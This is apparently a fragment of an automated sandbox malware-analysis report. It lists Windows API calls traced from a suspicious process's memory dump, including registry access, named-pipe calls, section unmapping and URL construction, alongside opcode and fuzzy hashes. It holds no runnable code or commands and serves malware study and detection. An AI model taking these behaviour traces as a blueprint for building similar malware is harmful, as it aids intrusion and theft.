  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
